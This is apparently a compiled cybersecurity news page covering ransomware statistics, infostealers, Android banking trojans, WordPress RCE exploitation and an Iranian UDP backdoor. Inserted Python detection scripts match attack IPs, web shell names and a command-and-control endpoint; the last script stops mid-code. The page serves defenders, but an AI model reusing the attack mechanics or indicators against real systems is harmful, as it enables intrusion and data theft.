The incident impacted multiple government agencies, including the IRS and DHS. Bloomberg reported in May that the contractor is a software company named Opexus. “Many of these databases contained records and documents related to Freedom of Information Act matters administered by federal government departments and agencies, as well as sensitive investigative files of federal government components,” the DoJ said. The brothers allegedly asked an artificial intelligence tool how to clear system logs of their actions.

In June 2015, the twin brothers were sentenced to several years in prison for conspiracy to commit wire fraud, conspiracy to access a protected computer without authorization, and conspiracy to access a government computer without authorization. They were rehired as government contractors after serving their sentences. Muneeb Akhter faces a maximum penalty of up to 45 years in prison, whereas Sohaib Akhter could get up to six years.

U.K. NCSC Debuts Proactive Notifications — The U.K.’s National Cyber Security Centre (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment. The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning. “This notification is based on scanning open source information, such as publicly available software versions,” NCSC said. “The service was launched to responsibly report vulnerabilities to system owners to help them protect their services.”

FinCEN Ransomware Trend Analysis Reveals Drop in Payments — According to a new analysis released by the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN), ransomware incidents reported to the authority decreased in 2024, with 1,476 incidents following law enforcement’s disruption of two high-profile ransomware groups, BlackCat and LockBit. Financial institutions paid $734 million to ransomware gangs, down from $1.1 billion in 2023. “The median amount of a single ransomware transaction was $124,097 in 2022; $175,000 in 2023; and $155,257 in 2024,” FinCEN said. “Between 2022 and 2024, the most common payment amount range was below $250,000.” More than $2.1 billion was paid to ransomware groups between 2022 and 2024, with about $1.1 billion paid in 2023 alone.

Akira led with the highest number of reported incidents, at 376, but BlackCat received the highest amount in payments, at approximately $395.3 million. Bangladeshi Student Behind New Botnet — A student hacker from Bangladesh is assessed to be behind a new botnet targeting WordPress and cPanel servers. “The perpetrator is using a botnet panel to distribute newly compromised websites to buyers, primarily Chinese threat actors,” Cyderes said. “The sites were primarily compromised via misconfigured WordPress and cPanel instances.” Some of the compromised websites are injected with a PHP-based web shell known as Beima PHP and leased to other threat actors for anywhere between $3 and $200.

The PHP backdoor script is designed to provide remote control over a compromised web server, allowing an attacker to manipulate files, inject arbitrary content, and rename files. The government and education sectors are the primary targets of this campaign, accounting for 76% of the compromised websites for sale. The college student claimed he is selling access to over 5,200 compromised websites through Telegram to pay for his education. Most of the operation’s customers are Chinese threat actors.

U.S. State Department Offers $10m Reward for Iranian Hacker Duo — The U.S. State Department announced a $10 million reward for two Iranian nationals linked to Iran’s cyber operations. Fatemeh Sedighian Kashi and Mohammad Bagher Shirinkar allegedly work for a company named Shahid Shushtari that operates with Iran’s Islamic Revolutionary Guard Corps CyberElectronic Command (IRGC-CEC).

Shahid Shushtari is the latest name for Emennet Pasargad , which has previously been identified as Aria Sepehr Ayandehsazan (ASA), Ayandeh Sazan Sepehr Arya (ASSA), Eeleyanet Gostar, and Net Peygard Samavat Company. The cluster is tracked by the cybersecurity community under the monikers Cobalt Obelisk, Cotton Sandstorm, Haywire Kitten (formerly ChaoticOrchestra), Marnanbridge, and UNC5866. “Shahid Shushtari members have caused significant financial damage and disruption to U.S. businesses and government agencies through coordinated cyber and cyber-enabled information operations,” the State Department said .

“These campaigns have targeted multiple critical infrastructure sectors, including news, shipping, travel, energy, financial, and telecommunications in the United States, Europe, and the Middle East.” The front company has also been linked to a multi-faceted campaign targeting the U.S. presidential election in August 2020. New Arkanix and Sryxen Stealers Spotted — Two new information stealers, Arkanix and Sryxen , are being marketed as a way to steal sensitive data and make short-term, quick financial gains. “Written in C++, [Sryxen] combines DPAPI decryption for traditional browser credentials with a Chrome 127+ bypass that sidesteps Google’s new App-Bound Encryption – by simply launching Chrome headlessly and asking it to decrypt its own cookies via DevTools Protocol,” DeceptIQ said.

“The anti-analysis is ‘more sophisticated’ than most commodity stealers: VEH-based code encryption means the main payload is garbage at rest, only decrypted during execution via exception handling.” The disclosures coincide with a campaign codenamed AIRedScam that uses booby-trapped AI tools shared on GitHub to deliver SmartLoader and other infostealers. “What sets AIRedScam apart is its choice in targeting Offensive Cybersecurity professionals looking for tools that can automate their enumeration and recon,” UltraViolet Cyber said . FBI Warns of Virtual Kidnapping Ransom Scams — The U.S. Federal Bureau of Investigation (FBI) warned that scammers are demanding ransoms in fake kidnapping schemes that alter photos found on social media or other publicly available sites to use as fake proof-of-life photos.

“Criminal actors typically will contact their victims through text message, claiming they have kidnapped their loved one and demand a ransom be paid for their release,” the FBI said . “The criminal actors pose as kidnappers and provide seemingly real photos or videos of victims along with demands for ransom payments. Criminal actors will sometimes purposefully send these photos using timed message features to limit the amount of time victims have to analyze the images.” Russian Hackers Spoof European Security Events in Phishing Wave — Threat actors from Russia have continued to heavily target both Microsoft and Google environments by abusing OAuth and Device Code authentication workflows to phish credentials from end users. “These attacks involved the creation of fake websites masquerading as legitimate international security events taking place in Europe, with the aim of tricking users who registered for these events into granting unauthorized access to their accounts,” Volexity said .

What’s notable about the new wave is that the attackers offer to provide “live support” to targeted users via messaging apps like Signal and WhatsApp to ensure they correctly return the URL, in the case of OAuth phishing workflows. The campaigns, a continuation of prior waves detected earlier this year, have been attributed to a cyber espionage group known as UTA0355. Shanya PaaS Fuels New Attacks — A packer-as-a-service (PaaS) offering known as Shanya has taken over the role previously played by HeartCrypt to decrypt and load a malicious program capable of killing endpoint security solutions. The attack leverages a vulnerable legitimate driver (“ ThrottleStop.sys “) and a malicious unsigned kernel driver (“hlpdrv.sys”) to achieve its goals.

“The user mode killer searches the running processes and installed services,” Sophos researchers Gabor Szappanos and Steeve Gaudreault said . “If it finds a match, it sends a kill command to the malicious kernel driver. The malicious kernel driver abuses the vulnerable clean driver, gaining write access that enables the termination and deletion of the processes and services of the protection products.” The first deployment of the EDR killer is said to have occurred near the end of April 2025 in a Medusa ransomware attack. It has since been put to use in multiple ransomware operations, including Akira, Qilin, and Crytox.

The packer has also been employed to distribute CastleRAT as part of a Booking.com-themed ClickFix campaign. 🎥 Cybersecurity Webinars
How to Detect Hidden Risks in AWS, AI, and Kubernetes — Before Attackers Do

Cloud threats are getting smarter—and harder to see. Join our experts to learn how code-to-cloud detection reveals hidden risks across identities, AI, and Kubernetes, helping you stop attacks before they reach production.

Learn How Top Teams Secure Cloud Infrastructure While Staying Fully Compliant

Securing cloud workloads isn’t just defense — it’s about enabling innovation safely. Learn practical, proven ways to strengthen access control, maintain compliance, and protect infrastructure without slowing agility.

🔧 Cybersecurity Tools

RAPTOR — An open-source AI-powered security tool that automates code scanning, fuzzing, vulnerability analysis, exploit generation, and OSS forensics. It’s useful when you need to quickly test software for bugs, understand whether a vulnerability is real, or gather evidence from a public GitHub repo. Instead of running many separate tools, RAPTOR chains them together and uses an AI agent to guide the process.

Google Threat Intelligence Browser Extension — For security analysts and threat researchers: highlights suspicious IPs, URLs, domains, and file hashes directly in your browser. Get instant context, investigate without switching tabs, track threats, and collaborate — all while staying protected. Available for Chrome, Edge, and Firefox.

Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.

Conclusion

Each story this week points to the same truth: the line between innovation and exploitation keeps getting thinner. Every new tool brings new risks, and every fix opens the door to the next discovery. The cycle isn’t slowing — but awareness, speed, and shared knowledge still make the biggest difference. Stay sharp, keep your systems patched, and don’t tune out the quiet warnings. The next breach always starts small.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

How Can Retailers Cyber-Prepare for the Most Vulnerable Time of the Year?

The holiday season compresses risk into a short, high-stakes window. Systems run hot, teams run lean, and attackers time automated campaigns to get maximum return. Multiple industry threat reports show that bot-driven fraud, credential stuffing and account takeover attempts intensify around peak shopping events, especially the weeks around Black Friday and Christmas.

Why holiday peaks amplify credential risk

Credential stuffing and password reuse are attractive to attackers because they scale: leaked username/password lists are tested automatically against retail login portals and mobile apps, and successful logins unlock stored payment tokens, loyalty balances and shipping addresses.

These are assets that can be monetized immediately. Industry telemetry indicates adversaries “pre-stage” attack scripts and configurations in the days before major sale events to ensure access during peak traffic. Retail history also shows how vendor or partner credentials expand the blast radius. The 2013 Target breach remains a classic case: attackers used credentials stolen from an HVAC vendor to gain network access and install malware on POS systems, leading to large-scale card data theft.

That incident is a clear reminder that third-party access must be treated with the same rigor as internal accounts.

Customer account security: Passwords, MFA and UX tradeoffs

Retailers can’t afford to over-friction checkout flows, but they also can’t ignore the fact that most account takeover attempts start with weak, reused, or compromised passwords. Adaptive (conditional) MFA is the best compromise: prompt for a second factor when the login or transaction is risky (new device, high-value change, anomalous location) but keep the common customer journey smooth. NIST’s digital identity guidance and major vendor recommendations suggest blocking known compromised credentials, focusing on password length and entropy rather than archaic complexity rules, and moving toward phishing-resistant passwordless options such as passkeys where feasible.

Being careful with staff and third-party access can reduce the operational blast radius. Employee and partner accounts often have more authority than customer accounts. Admin consoles, POS backends, vendor portals, and remote access all deserve mandatory MFA and strict access controls. Use SSO with conditional MFA to reduce friction for legitimate staff while protecting high-risk actions, and require privileged credentials to be unique and stored in a vault or PAM system.

Incidents that illustrate the risk

- Target (2013): Attackers used stolen vendor credentials to penetrate the network and deploy POS malware, showing how third-party access can enable broad compromise.
- Boots (2020): Boots temporarily suspended Advantage Card payments after attackers reused credentials from other breaches to attempt logins, affecting roughly 150,000 customer accounts and forcing an operational response to protect loyalty balances.
- Zoetop / SHEIN (investigation and settlement): New York’s Attorney General found Zoetop inadequately handled a large credential compromise, resulting in enforcement action and fines, an example of how poor breach response and weak password handling amplify risk.

Technical controls to prevent credential abuse at scale

Peak season requires layered defenses that stop automated abuse without creating friction for real users:

- Bot management and device-behavior fingerprints to separate human shoppers from scripted attacks.
- Rate limits and progressive challenge escalation to slow credential-testing campaigns.
- Credential-stuffing detection that flags behavioral patterns, not just volume.
- IP reputation and threat intelligence to block known malicious sources.
- Invisible or risk-based challenge flows instead of aggressive CAPTCHAs that harm conversion.
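The adaptive MFA triggers described under customer account security (new device, anomalous location, high-value change) and the controls listed above (behavioral credential-stuffing detection, progressive challenge escalation) can be combined in one login decision engine. The following Python is an added example written for this page; it is not Specops’ product code or taken from any vendor. The attempt records, thresholds, IP addresses (documentation ranges) and rule names are all constructed for the illustration.

```python
"""Risk-based login decisions for a retail login portal (added example).

Per-attempt signals drive adaptive MFA; per-source signals inside a sliding
window drive credential-stuffing detection.  The response escalates
progressively: allow -> mfa (step-up) -> challenge -> block.
Thresholds and sample attempts are constructed for this example.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

WINDOW_SECONDS = 60           # sliding window for per-source velocity
CHALLENGE_DISTINCT_USERS = 5  # distinct usernames from one source -> challenge
BLOCK_DISTINCT_USERS = 15     # distinct usernames from one source -> block
STUFFING_FAILURE_RATIO = 0.8  # share of failures that marks scripted testing
SEVERITY = {"allow": 0, "mfa": 1, "challenge": 2, "block": 3}


@dataclass(frozen=True)
class Attempt:
    ts: int             # seconds since the start of the sample
    ip: str
    user: str
    known_device: bool  # device cookie/fingerprint seen before for this user
    country: str
    action: str         # "login" or a high-value change such as "change_payment"
    success: bool       # result of the password check


class LoginRiskEngine:
    def __init__(self):
        self._recent = defaultdict(deque)  # ip -> attempts inside the window
        self._last_country = {}            # user -> country of last accepted login

    def _source_velocity(self, attempt):
        """Distinct usernames and failure ratio seen from this IP in the window."""
        q = self._recent[attempt.ip]
        q.append(attempt)
        while q[0].ts < attempt.ts - WINDOW_SECONDS:
            q.popleft()
        distinct_users = len({a.user for a in q})
        failure_ratio = sum(not a.success for a in q) / len(q)
        return distinct_users, failure_ratio

    def decide(self, attempt):
        """Return (level, reasons) for one attempt; feed attempts in time order."""
        reasons = []
        level = "allow"
        # Per-attempt signals: step up to a second factor only when risky.
        if not attempt.known_device:
            reasons.append("new_device")
        last = self._last_country.get(attempt.user)
        if last is not None and last != attempt.country:
            reasons.append("anomalous_location")
        if attempt.action != "login":
            reasons.append("high_value_action")
        if reasons:
            level = "mfa"
        # Per-source signals: a behavioural stuffing pattern, not raw volume.
        distinct_users, failure_ratio = self._source_velocity(attempt)
        if distinct_users >= BLOCK_DISTINCT_USERS:
            reasons.append("source_velocity_block")
            level = "block"
        elif distinct_users >= CHALLENGE_DISTINCT_USERS and failure_ratio >= STUFFING_FAILURE_RATIO:
            reasons.append("stuffing_pattern")
            if SEVERITY[level] < SEVERITY["challenge"]:
                level = "challenge"
        if attempt.success and level != "block":
            self._last_country[attempt.user] = attempt.country
        return level, reasons


def evaluate(attempts):
    """Run every attempt through a fresh engine; returns (user, level, reasons)."""
    engine = LoginRiskEngine()
    return [(a.user, *engine.decide(a)) for a in sorted(attempts, key=lambda a: a.ts)]


def summarize(results):
    counts = {level: 0 for level in SEVERITY}
    for _, level, _ in results:
        counts[level] += 1
    return counts


# Constructed sample: one genuine shopper and one source testing leaked credentials.
SAMPLE_ATTEMPTS = [
    Attempt(0, "203.0.113.7", "alice", True, "GB", "login", True),
    Attempt(5, "203.0.113.7", "alice", False, "GB", "login", True),           # new device
    Attempt(6, "203.0.113.7", "alice", True, "GB", "change_payment", True),   # high-value change
    Attempt(7, "203.0.113.7", "alice", True, "NG", "login", True),            # new country
    *[Attempt(10 + i, "198.51.100.9", f"user{i:02d}", False, "US", "login", False)
      for i in range(30)],                                                    # stuffing run
    Attempt(45, "198.51.100.9", "user30", False, "US", "login", True),        # one hit, still blocked
]

if __name__ == "__main__":
    for user, level, reasons in evaluate(SAMPLE_ATTEMPTS):
        print(f"{user:8} {level:10} {','.join(reasons)}")
    print(summarize(evaluate(SAMPLE_ATTEMPTS)))
```

The design point is that the stuffing source is challenged after five distinct usernames with a high failure ratio and blocked after fifteen, regardless of whether the password check eventually succeeds, while the genuine shopper only ever sees a step-up prompt on the risky attempts.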

Industry reports repeatedly call out bot automation and “pre-staged” attack configs as primary drivers of holiday fraud, so investing in these controls ahead of peak weeks pays off.

Operational continuity: Test failovers before they’re needed

Authentication providers and SMS routes can fail, and if they do during peak trading, the result can be lost revenue and long queues. Retailers should test and document failover procedures:

- Pre-approved emergency access via short-lived, auditable credentials in a secure vault.
- Manual verification workflows for in-store or phone purchases.
- Tabletop exercises and load testing that include MFA and SSO failovers.

These steps protect revenue as much as they protect data.

Where Specops Password Policy helps

Specops Password Policy addresses several high-impact controls retailers need before peak weeks:

- Block compromised and common passwords by checking resets and new passwords against known breach datasets, continuously scanning your Active Directory against our database of over 4.5 billion compromised passwords.
- Enforce user-friendly rules (passphrases, pattern blocklists) that improve security without adding help-desk overhead.
- Integrate with Active Directory for rapid enforcement across POS, admin, and backend systems.
- Provide operational telemetry so you can spot risky password patterns and ATO attempts early.

Book a live walkthrough of Specops Password Policy with an expert today.

This article is a contributed piece from one of our valued partners.

Android Malware FvncBot, SeedSnatcher, and ClayRat Gain Stronger Data Theft Features

Cybersecurity researchers have disclosed details of two new Android malware families dubbed FvncBot and SeedSnatcher , as another upgraded version of ClayRat has been spotted in the wild. The findings come from Intel 471 , CYFIRMA , and Zimperium , respectively. FvncBot, which masquerades as a security app developed by mBank, targets mobile banking users in Poland. What’s notable about the malware is that it’s completely written from scratch and is not inspired by other Android banking trojans like ERMAC that have had their source code leaked.

The malware “implemented multiple features including keylogging by abusing Android’s accessibility services, web-inject attacks, screen streaming and hidden virtual network computing (HVNC) to perform successful financial fraud,” Intel 471 said. Similar to the recently uncovered Albiriox banking malware, the malware is protected by a crypting service known as apk0day that’s offered by Golden Crypt. The malicious app acts as a loader by installing the embedded FvncBot payload. As soon as the dropper app is launched, users are prompted to install a Google Play component to ensure the security and stability of the app, when, in reality, it leads to the deployment of the malware by making use of a session-based approach that has been adopted by other threat actors to bypass accessibility restrictions on Android devices running versions 13 and newer.

“During the malware runtime, the log events were sent to the remote server at the naleymilva.it.com domain to track the current status of the bot,” Intel 471 said. “The operators included a build identifier call_pl, which indicated Poland as a targeted country, and the malware version was set to 1.0-P, suggesting an early stage of development.” The malware then proceeds to ask the victim to grant it accessibility services permissions, allowing it to operate with elevated privileges and connect to an external server over HTTP to register the infected device and receive commands in return using the Firebase Cloud Messaging (FCM) service.

[Figure: FvncBot’s process enabling the accessibility service]

Some of the supported functions are listed below:

- Start/stop a WebSocket connection to remotely control the device and swipe, click, or scroll to navigate the device’s screen
- Exfiltrate logged accessibility events to the controller
- Exfiltrate the list of installed applications
- Exfiltrate device information and bot configuration
- Receive configuration to serve malicious overlays atop targeted applications
- Show a full-screen overlay to capture and exfiltrate sensitive data
- Hide an overlay
- Check accessibility services status
- Abuse accessibility services to log keystrokes
- Fetch pending commands from the controller
- Abuse Android’s MediaProjection API to stream screen content

FvncBot also facilitates what’s called a text mode to inspect the device screen layout and content even in scenarios where an app prevents screenshots from being taken by setting the FLAG_SECURE option.

It’s currently not known how FvncBot is distributed, but Android banking trojans are known to leverage SMS phishing and third-party app stores as a propagation vector. “Android’s accessibility service is intended to aid users with disabilities, but it also can give attackers the ability to know when certain apps are launched and overwrite the screen’s display,” Intel 471 said. “Although this particular sample was configured to target Polish-speaking users, it is plausible we will observe this theme shifting to target other regions or to impersonate other Polish institutions.” While FvncBot’s core focus is on data theft, SeedSnatcher – distributed under the name Coin through Telegram – is designed to enable the theft of cryptocurrency wallet seed phrases. It also supports the ability to intercept incoming SMS messages to steal two-factor authentication (2FA) codes for account takeovers, as well as capture device data, contacts, call logs, files, and sensitive data by displaying phishing overlays.

It’s assessed that the operators of SeedSnatcher are either China-based or Chinese-speaking based on the presence of Chinese language instructions shared via Telegram and the stealer’s control panel. “The malware leverages advanced techniques to evade detection, including dynamic class loading, stealthy WebView content injection, and integer-based command-and-control instructions,” CYFIRMA said. “While initially requesting minimal runtime permissions such as SMS access, it later escalates privileges to access the Files manager, overlays, contacts, call logs, and more.” The developments come as Zimperium zLabs said it discovered an improved version of ClayRat that has been updated to abuse accessibility services along with exploiting its default SMS permissions, making it a more potent threat capable of recording keystrokes and the screen, serving different overlays like a system update screen to conceal malicious activity, and creating fake interactive notifications to steal victims’ responses.

[Figure: ClayRat’s default SMS and accessibility permission]

The expansion in ClayRat’s capabilities, in a nutshell, facilitates full device takeover through accessibility services abuse, automated unlocking of device PIN/password/pattern, screen recording, notification harvesting, and persistent overlays.

ClayRat has been disseminated via 25 fraudulent phishing domains that impersonate legitimate services like YouTube, advertising a Pro version for background playback and 4K HDR support. Dropper apps distributing the malware have also been found to mimic Russian taxi and parking applications. “Together, these capabilities make ClayRat a more dangerous spyware compared to its previous version where the victim could uninstall the application or turn off the device upon detecting the infection,” researchers Vishnu Pratapagiri and Fernando Ortega said.

Sneeit WordPress RCE Exploited in the Wild While ICTBroadcast Bug Fuels Frost Botnet Attacks

A critical security flaw in the Sneeit Framework plugin for WordPress is being actively exploited in the wild, per data from Wordfence. The remote code execution vulnerability in question is CVE-2025-6389 (CVSS score: 9.8), which affects all versions of the plugin prior to and including 8.3. It has been patched in version 8.4, released on August 5, 2025. The plugin has more than 1,700 active installations.

“This is due to the [sneeit_articles_pagination_callback()] function accepting user input and then passing that through call_user_func(),” Wordfence said . “This makes it possible for unauthenticated attackers to execute code on the server, which can be leveraged to inject backdoors or, for example, create new administrative user accounts.” In other words, the vulnerability can be leveraged to call an arbitrary PHP function, such as wp_insert_user(), to insert a malicious administrator user, which an attacker can then weaponize to seize control of the site and inject malicious code that can redirect site visitors to other sketchy sites, malware, or spam. Wordfence said in-the-wild exploitation commenced on November 24, 2025, the same day it was publicly disclosed, with the company blocking over 131,000 attempts targeting the flaw. Out of these, 15,381 attack attempts were recorded over the past 24 hours alone.

Some of the efforts include sending specially crafted HTTP requests to the “/wp-admin/admin-ajax.php” endpoint to create a malicious admin user account like “arudikadis” and upload a malicious PHP file “tijtewmg.php” that likely grants backdoor access. The attacks have originated from the following IP addresses:

- 185.125.50[.]59
- 182.8.226[.]51
- 89.187.175[.]80
- 194.104.147[.]192
- 196.251.100[.]39
- 114.10.116[.]226
- 116.234.108[.]143

The WordPress security company said it also observed malicious PHP files that come with capabilities to scan directories, read, edit, or delete files and their permissions, and allow for the extraction of ZIP files. These PHP files go by the names “xL.php,” “Canonical.php,” “.a.php,” and “simple.php.” The “xL.php” shell, per Wordfence, is downloaded by another PHP file called “up_sf.php” that’s designed to exploit the vulnerability. It also downloads an “.htaccess” file from an external server (“racoonlab[.]top”) onto the compromised host.
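For site owners checking whether they were hit, the indicators above (attacking IP addresses, web shell file names, the rogue administrator name) can be matched against web server access logs and the WordPress user list. The Python below is an added example for this page, not Wordfence’s tooling; the log lines are constructed (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges), and the only real values are the indicators quoted in the write-up with their defanging brackets removed.

```python
"""Hunt for the Sneeit exploitation indicators in access logs (added example).

Parses combined-format access log lines and flags requests from the reported
attack IPs and requests for the reported web shell file names.  admin-ajax.php
is used by legitimate plugins, so it is only reported in combination with a
known attack IP.  Sample log lines are constructed for this example.
"""
import re
from dataclasses import dataclass, field

# Indicators reported in the Wordfence write-up summarized above.
SNEEIT_ATTACK_IPS = {
    "185.125.50.59", "182.8.226.51", "89.187.175.80", "194.104.147.192",
    "196.251.100.39", "114.10.116.226", "116.234.108.143",
}
WEBSHELL_NAMES = {"tijtewmg.php", "xL.php", "Canonical.php", ".a.php", "simple.php", "up_sf.php"}
ROGUE_ADMIN_USERS = {"arudikadis"}
WP_AJAX_ENDPOINT = "/wp-admin/admin-ajax.php"

# Apache/Nginx combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Finding:
    ip: str
    path: str
    reasons: list = field(default_factory=list)


def scan_access_log(lines):
    """Return one Finding per log line that matches at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, path = m["ip"], m["path"]
        clean_path = path.split("?", 1)[0]       # drop the query string
        name = clean_path.rsplit("/", 1)[-1]     # file name component
        reasons = []
        if ip in SNEEIT_ATTACK_IPS:
            reasons.append("known_attack_ip")
            if clean_path == WP_AJAX_ENDPOINT:
                reasons.append("admin_ajax_from_attack_ip")
        if name in WEBSHELL_NAMES:
            reasons.append("webshell_filename:" + name)
        if reasons:
            findings.append(Finding(ip, clean_path, reasons))
    return findings


def rogue_admins(usernames):
    """Return the reported rogue administrator names present in a WP user list."""
    return sorted(u for u in usernames if u in ROGUE_ADMIN_USERS)


# Constructed sample log: two benign requests, three matching the indicators.
SAMPLE_LOG = [
    '203.0.113.10 - - [24/Nov/2025:10:00:01 +0000] "GET /blog/ HTTP/1.1" 200 5120',
    '185.125.50.59 - - [24/Nov/2025:10:00:07 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 43',
    '185.125.50.59 - - [24/Nov/2025:10:00:09 +0000] "GET /wp-content/uploads/tijtewmg.php?x=1 HTTP/1.1" 200 128',
    '203.0.113.11 - - [24/Nov/2025:10:01:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 87',
    '198.51.100.23 - - [24/Nov/2025:10:02:13 +0000] "GET /wp-content/uploads/2025/11/xL.php HTTP/1.1" 200 4096',
    'this line is not in combined log format and is skipped',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f.ip, f.path, ",".join(f.reasons))
    print("rogue admins:", rogue_admins(["admin", "arudikadis", "editor"]))
```

A hit on a web shell file name is worth acting on by itself; a hit on admin-ajax.php alone is not, which is why the scanner ties that endpoint to the reported source addresses rather than flagging every call to it.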

“This .htaccess file ensures that access to files with certain file extensions is granted on Apache servers,” István Márton said. “This is useful in cases where other .htaccess files prohibit access to scripts, for example, in upload directories.”

ICTBroadcast Flaw Exploited to Deliver “Frost” DDoS Botnet

The disclosure comes as VulnCheck said it observed fresh attacks exploiting a critical ICTBroadcast flaw (CVE-2025-2611, CVSS score: 9.3) targeting its honeypot systems to download a shell script stager that downloads multiple architecture-specific versions of a binary called “frost.” Each of the downloaded versions is executed, followed by the deletion of the payloads and the stager itself to cover up traces of the activity. The end goal of the activity is to carry out distributed denial-of-service (DDoS) attacks against targets of interest. “The ‘frost’ binary combines DDoS tooling with spreader logic that includes fourteen exploits for fifteen CVEs,” VulnCheck’s Jacob Baines said.

“The important part is how it spreads. The operator is not carpet bombing the internet with exploits. ‘Frost’ checks the target first and only proceeds with exploitation when it sees the specific indicators it expects.” For instance, the binary exploits CVE-2025-1610 only after receiving an HTTP response that contains “Set-Cookie: user=(null)” and then a follow-on response to a second request that contains “Set-Cookie: user=admin.” If those markers are not present, the binary stays dormant and does nothing. The attacks are launched from the IP address 87.121.84[.]52.

While the identified vulnerabilities have been exploited by various DDoS botnets, evidence points to the latest attacks being a small, targeted operation, given that there are fewer than 10,000 internet-exposed systems that are susceptible to them. “This limits how large a botnet built on these CVEs can get, which makes this operator a relatively small player,” Baines said. “Notably, the ICTBroadcast exploit that delivered this sample does not appear in the binary, which indicates the operator has additional capabilities not visible here.”

MuddyWater Deploys UDPGangster Backdoor in Targeted Turkey-Israel-Azerbaijan Campaign

The Iranian hacking group known as MuddyWater has been observed leveraging a new backdoor dubbed UDPGangster that uses the User Datagram Protocol (UDP) for command-and-control (C2) purposes. The cyber espionage activity targeted users in Turkey, Israel, and Azerbaijan, according to a report from Fortinet FortiGuard Labs. “This malware enables remote control of compromised systems by allowing attackers to execute commands, exfiltrate files, and deploy additional payloads – all communicated through UDP channels designed to evade traditional network defenses,” security researcher Cara Lin said . The attack chain involves using spear-phishing tactics to distribute booby-trapped Microsoft Word documents that trigger the execution of a malicious payload once macros are enabled.

Some of the phishing messages impersonate the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs and purport to invite recipients to an online seminar titled “Presidential Elections and Results.” Attached to the emails are a ZIP file (“seminer.zip”) and a Word document (“seminer.doc”). The ZIP file contains the same Word document; when it is opened, users are asked to enable macros, which stealthily executes the embedded VBA code. For its part, the VBA script in the dropper file is equipped to conceal any sign of malicious activity by displaying a Hebrew-language decoy image from Israeli telecommunications provider Bezeq about supposed disconnection periods in the first week of November 2025 across various cities in the country. “The macro uses the Document_Open() event to automatically execute, decoding Base64-encoded data from a hidden form field (UserForm1.bodf90.Text) and writing the decoded content to C:\Users\Public\ui.txt,” Lin explained.

“It then executes this file using the Windows API CreateProcessA, launching the UDPGangster payload.” UDPGangster establishes persistence through Windows Registry modifications and includes various anti-analysis checks to resist efforts by security researchers to take it apart. These include:

- Verifying whether the process is being debugged
- Analyzing CPU configurations for sandboxes or virtual machines
- Determining whether the system has less than 2048 MB of RAM
- Retrieving network adapter information to validate whether the MAC address prefix matches a list of known virtual machine vendors
- Validating whether the computer is part of the default Windows workgroup rather than a joined domain
- Examining running processes for tools like VBoxService.exe, VBoxTray.exe, vmware.exe, and vmtoolsd.exe
- Running Registry scans to search for matches to known virtualization vendor identifiers, such as VBox, VMBox, QEMU, VIRTUAL, VIRTUALBOX, VMWARE, and Xen
- Searching for known sandboxing or debugging tools
- Ascertaining whether the file is running in an analysis environment

Only after these checks are satisfied does UDPGangster proceed to gather system information and connect to an external server (“157.20.182[.]75”) over UDP port 1269 to exfiltrate collected data, run commands using “cmd.exe,” transmit files, update the C2 server, and drop and execute additional payloads. “UDPGangster uses macro-based droppers for initial access and incorporates extensive anti-analysis routines to evade detection,” Lin said. “Users and organizations should remain cautious of unsolicited documents, particularly those requesting macro activation.” The development comes days after ESET attributed the threat actor to attacks spanning academia, engineering, local government, manufacturing, technology, transportation, and utilities sectors in Israel that delivered another backdoor referred to as MuddyViper.
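The chain described above (Word writes a decoded file to C:\Users\Public, launches it with CreateProcessA, the payload runs cmd.exe and talks to the C2 over UDP port 1269) gives a defender several behavioural hooks that do not depend on the sample’s hash. The following Python is an added example for this page, not FortiGuard Labs’ detection content. The event records are constructed in a simplified Sysmon-like shape assumed for the example; the Office image list and rule names are my own choices, and the only page-derived values are the file path and the C2 address and port.

```python
"""Behavioural detection for the UDPGangster macro-dropper chain (added example).

Runs four rules over constructed Sysmon-style events: an Office process
creating a file under C:\\Users\\Public, an Office process launching a file
from there, a process whose image lacks an executable extension, cmd.exe
spawned by such a payload, and a UDP connection to the reported C2 endpoint.
"""
import ntpath

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}  # assumed parent set
PUBLIC_DIR = r"c:\users\public"
EXECUTABLE_EXTENSIONS = (".exe", ".com", ".scr")
# Endpoint reported in the FortiGuard Labs write-up (defanging removed).
C2_ENDPOINT = ("157.20.182.75", 1269)


def _basename(path):
    return ntpath.basename(path).lower()


def _under_public(path):
    return path.lower().startswith(PUBLIC_DIR + "\\")


def detect(events):
    """Return (rule_name, event_id) hits; events must be in chronological order."""
    hits = []
    launched_from_public = set()  # images an Office process started from C:\Users\Public
    for ev in events:
        kind, image = ev["type"], ev.get("image", "")
        if kind == "FileCreate":
            if _basename(image) in OFFICE_IMAGES and _under_public(ev["target"]):
                hits.append(("office_writes_to_public", ev["id"]))
        elif kind == "ProcessCreate":
            parent = ev.get("parent", "")
            if _basename(parent) in OFFICE_IMAGES and _under_public(image):
                hits.append(("office_launches_public_file", ev["id"]))
                launched_from_public.add(image.lower())
            if not image.lower().endswith(EXECUTABLE_EXTENSIONS):
                hits.append(("non_executable_extension_process", ev["id"]))
            if _basename(image) == "cmd.exe" and parent.lower() in launched_from_public:
                hits.append(("cmd_spawned_by_public_payload", ev["id"]))
        elif kind == "NetworkConnect":
            if ev.get("protocol") == "udp" and (ev["dst_ip"], ev["dst_port"]) == C2_ENDPOINT:
                hits.append(("udpgangster_c2_udp_1269", ev["id"]))
    return hits


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EXPLORER = r"C:\Windows\explorer.exe"

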